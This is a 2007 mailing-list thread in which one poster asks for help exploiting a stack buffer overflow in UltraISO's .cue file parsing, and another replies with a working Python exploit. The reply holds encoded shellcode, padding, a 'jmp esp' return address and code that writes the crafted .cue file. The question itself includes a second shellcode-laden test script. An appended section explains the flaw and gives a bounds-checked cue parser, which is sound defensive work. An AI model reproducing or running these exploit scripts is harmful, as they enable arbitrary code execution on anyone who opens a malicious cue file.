Vulnerability Development mailing list archives
Re: Help developing exploit
From: "Thomas Pollet" <thomas.pollet () gmail com>
Date: Mon, 28 May 2007 16:34:50 +0200
Hi, try to return to a "jmp esp", also pick one that doesn't result in an invalid file format. e.g.

import struct
scode=(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"
"\x42\x50\x42\x50\x42\x30\x4b\x58\x45\x54\x4e\x33\x4b\x38\x4e\x57"
"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x41\x4b\x38"
"\x4f\x35\x42\x42\x41\x30\x4b\x4e\x49\x34\x4b\x58\x46\x33\x4b\x58"
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c"
"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48"
"\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x54"
"\x4b\x58\x4f\x35\x4e\x31\x41\x50\x4b\x4e\x4b\x38\x4e\x41\x4b\x38"
"\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x50\x43\x4c\x41\x53"
"\x42\x4c\x46\x46\x4b\x48\x42\x44\x42\x43\x45\x38\x42\x4c\x4a\x37"
"\x4e\x50\x4b\x48\x42\x44\x4e\x50\x4b\x48\x42\x57\x4e\x51\x4d\x4a"
"\x4b\x48\x4a\x46\x4a\x30\x4b\x4e\x49\x30\x4b\x58\x42\x58\x42\x4b"
"\x42\x30\x42\x50\x42\x30\x4b\x48\x4a\x46\x4e\x43\x4f\x55\x41\x43"
"\x48\x4f\x42\x56\x48\x55\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x57"
"\x42\x55\x4a\x46\x4f\x4e\x50\x4c\x42\x4e\x42\x46\x4a\x36\x4a\x49"
"\x50\x4f\x4c\x48\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x56"
"\x4e\x46\x43\x56\x50\x42\x45\x56\x4a\x37\x45\x36\x42\x30\x5a"
)
cue='FILE "'
cue+='B'*1099
#77f84143: ff e4 jmp *%esp
#had to try a few to get a good one
cue+=struct.pack('<L',0x77f84143)
cue+=scode
cue+='.bin" BINARY\n'
cue+=' TRACK 01 MODE1/2352\n INDEX 01 00:00:00'
cue_file = open("xpl.cue","w")
cue_file.write(cue)
bin_file = open("xpl.bin","w")

Regards,
Thomas Pollet

On 26 May 2007 17:32:12 -0000, KaCo678 () aol com <KaCo678 () aol com> wrote:
Hi, I was wondering if you would be able to help. I recently found a stack overflow in UltraISO and was trying to write a local exploit for it. But I'm able to find the address where my nop sled is, and everything I've tried hasn't worked. And well, as you seem to be a well respected member of the community you might be able to help me. I've asked a few people for help with this one, but still no further forward. I'll explain the best I can. I'm able to control the ecx register and eip. I attach OllyDbg and open the cue file. And the program crashes, my eip points to 90909090 (nop sled) lol, then I press Shift+F9 and then I can write anything I want to the eip, so for testing I wrote 41424344 which then wrote to the eip and ecx register. At 3299 bytes, then the 4 bytes to write to the registers. I've provided a little test script. It's a mess but it's just for testing m8. Also worth noting that we still have to actually fill the rest of the file. So altogether we have 5004 bytes to the file. I hope I'm making sense. I was gonna use the bouncing shared libraries method, but not sure. I changed the eip to the address of 0x7C80C75B jmp ebp as my nops were in there somewhere. I've written a Python script I'm using to test it. Also if you do take a look you will need to create a fake bin file in the same directory. Any help would be great, thanks for your time.

#!/usr/bin/python
###
import sys
import struct
import time
head_file = "\x46\x49\x4c\x45\x20\x22" #Header of file
buffer1 = "\x90" * 4000 #4000 nops
nop = "\x90" * 189 #189 nops
shell = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x51\x0a\xbb" # 110 bytes shell code
shell += "\x77\x1d\x80\x7c"
shell += "\x51\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb"
shell += "\x28\xac\x80\x7c"
shell += "\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x06\x31\xd2\x52\x51"
shell += "\x51\x52\xff\xd0\x31\xd2\x50\xb8\xa2\xca\x81\x7c\xff\xd0\xe8\xc4\xff"
shell += "\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x4e\xe8\xc2\xff\xff"
shell += "\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc2\xff\xff"
shell += "\xff\x4f\x6d\x65\x67\x61\x37\x4e"
fuck = "\x90" * 2 #lost 2 bytes some where made it up lol
offset = "\x41\x42\x43\x44"
buffer2 = "\x45" * 701 #fill the rest of the file with junk
Head_end = "\x2e\x42\x49\x4e\x22\x20\x42\x49\x4e\x41\x52\x59\x0d\x0a\x20" #end of file.
Head_end += "\x54\x52\x41\x43\x4b\x20\x30\x31\x20\x4d\x4f\x44\x45\x31\x2f\x32"
Head_end += "\x33\x35\x32\x0d\x0a\x20\x20\x20\x49\x4e\x44\x45\x58\x20\x30\x31"
Head_end += "\x20\x30\x30\x3a\x30\x30\x3a\x30\x30"
cue_file = open("1.cue","wb")
cue_file.write(head_file + buffer1 + nop + shell + fuck + offset + buffer2 + Head_end)
cue_file.close()

I'm very confused at the moment as a few people have told me a few ways to exploit this lol. But I'm still learning. I was wondering, could I just not point my eip to my nop sled, so my shellcode gets executed? I'm working with Windows XP SP2. Just can't seem to get to the address of my nop code.
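The crash both posters are working from comes down to one thing: the FILE "..." field of a .cue sheet is copied into a fixed-size stack buffer without a length check, so a file name of a few thousand bytes overwrites the saved return address. The added example below (my code, not from either poster or from UltraISO) is the defensive counterpart: a .cue parser that enforces a field-length limit before storing anything, so a sheet shaped like the crash files above is rejected up front rather than parsed. The 260-character name limit (mirroring Windows MAX_PATH), the 1024-byte line cap and the restriction to the FILE, TRACK and INDEX keywords are my assumptions; the two sample sheets are constructed for the example.

```python
# Added example: a bounds-checked parser for .cue sheets. Every field is
# length-checked before it is stored, which is the check the vulnerable
# parser discussed in the thread lacks.
# Assumptions (mine): MAX_PATH-style 260-char file names, 1024-byte lines,
# and only the FILE / TRACK / INDEX keywords.
import re

MAX_PATH = 260        # assumed file-name limit (Windows MAX_PATH)
MAX_LINE = 1024       # assumed sane upper bound for any single cue line

FILE_RE = re.compile(r'^FILE\s+"([^"]*)"\s+(\S+)\s*$')
TRACK_RE = re.compile(r'^TRACK\s+(\d{1,2})\s+(\S+)\s*$')
INDEX_RE = re.compile(r'^INDEX\s+(\d{1,2})\s+(\d{1,3}):(\d{2}):(\d{2})\s*$')


class CueError(ValueError):
    """Raised for any sheet that fails a length or grammar check."""


def parse_cue(text, max_path=MAX_PATH, max_line=MAX_LINE):
    """Parse a cue sheet into [{'file', 'type', 'tracks': [...]}].

    Lengths are checked *before* a field is copied anywhere, so an
    attacker-sized FILE name raises CueError instead of being accepted.
    """
    files = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        if len(raw) > max_line:
            raise CueError("line %d: %d bytes exceeds max_line %d"
                           % (lineno, len(raw), max_line))
        line = raw.strip()
        if not line:
            continue
        m = FILE_RE.match(line)
        if m:
            name, ftype = m.groups()
            if len(name) > max_path:
                raise CueError("line %d: FILE name is %d chars, limit %d"
                               % (lineno, len(name), max_path))
            if any(c in name for c in "\x00\r\n"):
                raise CueError("line %d: control byte in FILE name" % lineno)
            files.append({"file": name, "type": ftype, "tracks": []})
            continue
        m = TRACK_RE.match(line)
        if m:
            if not files:
                raise CueError("line %d: TRACK before any FILE" % lineno)
            files[-1]["tracks"].append({"number": int(m.group(1)),
                                        "mode": m.group(2), "indexes": []})
            continue
        m = INDEX_RE.match(line)
        if m:
            if not files or not files[-1]["tracks"]:
                raise CueError("line %d: INDEX before any TRACK" % lineno)
            mm, ss, ff = int(m.group(2)), int(m.group(3)), int(m.group(4))
            if ss > 59 or ff > 74:   # CD time is MM:SS:FF with 75 frames/sec
                raise CueError("line %d: bad MM:SS:FF value" % lineno)
            files[-1]["tracks"][-1]["indexes"].append(
                {"number": int(m.group(1)), "mm": mm, "ss": ss, "ff": ff})
            continue
        raise CueError("line %d: unrecognised or malformed line" % lineno)
    if not files:
        raise CueError("no FILE entry found")
    return files


def is_safe_cue(text):
    """True if the sheet passes every check, False otherwise."""
    try:
        parse_cue(text)
        return True
    except CueError:
        return False


# Constructed samples: a normal sheet, and one with a FILE name sized like
# the crash files in the thread.
GOOD_SHEET = ('FILE "disc.bin" BINARY\n'
              '  TRACK 01 MODE1/2352\n'
              '    INDEX 01 00:00:00\n')
OVERLONG_SHEET = ('FILE "' + "B" * 4000 + '.bin" BINARY\n'
                  '  TRACK 01 MODE1/2352\n'
                  '    INDEX 01 00:00:00\n')

if __name__ == "__main__":
    print(parse_cue(GOOD_SHEET))
    print("overlong sheet accepted:", is_safe_cue(OVERLONG_SHEET))
```

The order of the checks is the point: the line-length cap runs before any regex touches the input, the name-length check runs before the name is stored, and the structural checks (TRACK before FILE, INDEX before TRACK) run before anything is appended. A parser written this way never has an oversized field in hand to copy, which is exactly the condition the thread's crash depends on.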